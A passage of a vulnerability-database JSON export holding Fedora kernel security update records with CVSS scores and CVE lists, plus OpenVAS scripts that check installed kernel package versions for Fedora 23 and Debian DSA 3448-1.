{"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-01-26T18:29:15", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: kernel-4.3.3-303.fc23", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7513", "CVE-2015-7566", "CVE-2016-0728"], "modified": "2016-01-26T18:29:15", "id": "FEDORA:A5C89601FC0F", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/HZF6KAETGSSB4V3HHUUOE3KQKGV4GAUZ/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:53", "description": "The kernel meta package ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-02-01T06:34:15", "type": "fedora", "title": "[SECURITY] Fedora 22 Update: kernel-4.3.4-200.fc22", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4312", "CVE-2015-7513", "CVE-2015-7566", "CVE-2015-8569", "CVE-2015-8575", "CVE-2015-8709", "CVE-2015-8767", "CVE-2015-8787", "CVE-2016-0723", "CVE-2016-0728"], "modified": "2016-02-01T06:34:15", "id": "FEDORA:0D267606CFB3", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/MDJQSYZT5MIQ2KYAQUTMI6AZJRWWKFLQ/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:35:48", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-01-21T00:00:00", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2016-26", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7513", "CVE-2015-7566"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310806985", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806985", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2016-26\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806985\");\n script_version(\"$Revision: 14225 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 15:32:03 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-01-21 06:13:59 +0100 (Thu, 21 Jan 2016)\");\n script_cve_id(\"CVE-2015-7566\", \"CVE-2015-7513\");\n script_tag(name:\"cvss_base\", value:\"4.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2016-26\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 23\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-26\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2016-January/175792.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC23\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC23\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.3.3~301.fc23\", rls:\"FC23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2017-07-24T12:55:09", "description": "Several vulnerabilities have been\ndiscovered in the Linux kernel that may lead to a privilege escalation or\ndenial-of-service.\n\nCVE-2013-4312 \nTetsuo Handa discovered that it is possible for a process to open\nfar more files than the process", "cvss3": {}, "published": "2016-01-19T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3448-1 (linux - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0723", "CVE-2016-0728", "CVE-2015-8767", "CVE-2013-4312", "CVE-2015-7566"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:703448", "href": "http://plugins.openvas.org/nasl.php?oid=703448", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3448.nasl 6608 2017-07-07 12:05:05Z cfischer $\n# Auto-generated from advisory DSA 3448-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703448);\n script_version(\"$Revision: 6608 $\");\n script_cve_id(\"CVE-2013-4312\", \"CVE-2015-7566\", \"CVE-2015-8767\", \"CVE-2016-0723\",\n \"CVE-2016-0728\");\n script_name(\"Debian Security Advisory DSA 3448-1 (linux - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:05 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2016-01-19 00:00:00 +0100 (Tue, 19 Jan 2016)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2016/dsa-3448.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"linux on Debian Linux\");\n script_tag(name: \"insight\", value: \"The Linux kernel is the core\nof the Linux operating system.\");\n script_tag(name: \"solution\", value: \"For the stable distribution (jessie),\nthese problems have been fixed in version 3.16.7-ckt20-1+deb8u3.\n\nWe recommend that you upgrade your linux packages.\");\n script_tag(name: \"summary\", value: \"Several vulnerabilities have been\ndiscovered in the Linux kernel that may lead to a privilege escalation or\ndenial-of-service.\n\nCVE-2013-4312 \nTetsuo Handa discovered that it is possible for a process to open\nfar more files than the process' limit leading to denial-of-service\nconditions.\n\nCVE-2015-7566 \nRalf Spenneberg of OpenSource Security reported that the visor\ndriver crashes when a specially crafted USB device without bulk-out\nendpoint is detected.\n\nCVE-2015-8767 \nAn SCTP denial-of-service was discovered which can be triggered by a\nlocal attacker during a heartbeat timeout event after the 4-way\nhandshake.\n\nCVE-2016-0723 \nA use-after-free vulnerability was discovered in the TIOCGETD ioctl.\nA local attacker could use this flaw for denial-of-service.\n\nCVE-2016-0728 \nThe Perception Point research team discovered a use-after-free\nvulnerability in the keyring facility, possibly leading to local\nprivilege escalation.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"linux-compiler-gcc-4.8-arm\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-compiler-gcc-4.8-s390\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-compiler-gcc-4.8-x86\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-doc-3.16\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-4kc-malta\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-586\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-5kc-malta\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-686-pae\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-amd64\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-arm64\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-armel\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-armhf\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-i386\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-mips\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-mipsel\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-powerpc\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-ppc64el\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-s390x\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-amd64\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-arm64\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-armmp\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-armmp-lpae\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-common\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-ixp4xx\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-kirkwood\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-loongson-2e\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-loongson-2f\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-loongson-3\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-octeon\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-orion5x\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-powerpc\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-powerpc-smp\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-powerpc64\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-powerpc64le\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-r4k-ip22\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-r5k-ip32\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-s390x\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-sb1-bcm91250a\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-versatile\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-4kc-malta\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-5kc-malta\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-mips\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-mipsel\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-common\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-loongson-2f\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-octeon\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-r4k-ip22\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-r5k-cobalt\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-r5k-ip32\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-sb1-bcm91250a\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-sb1a-bcm91480b\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-4kc-malta\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-586\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-5kc-malta\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-686-pae\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-686-pae-dbg\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-amd64\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-amd64-dbg\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-arm64\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-arm64-dbg\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-armmp\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-armmp-lpae\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-ixp4xx\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-kirkwood\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-loongson-2e\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-loongson-2f\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-loongson-3\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-octeon\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-orion5x\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-powerpc\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-powerpc-smp\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-powerpc64\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-powerpc64le\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-r4k-ip22\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-r5k-ip32\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-s390x\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-s390x-dbg\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-sb1-bcm91250a\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-versatile\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-4kc-malta\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-5kc-malta\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-loongson-2f\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-octeon\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-r4k-ip22\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-r5k-cobalt\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-r5k-ip32\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-sb1-bcm91250a\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-sb1a-bcm91480b\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-libc-dev:amd64\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-libc-dev:i386\", ver:\"3.16.7-ckt20-1+deb8u3\", 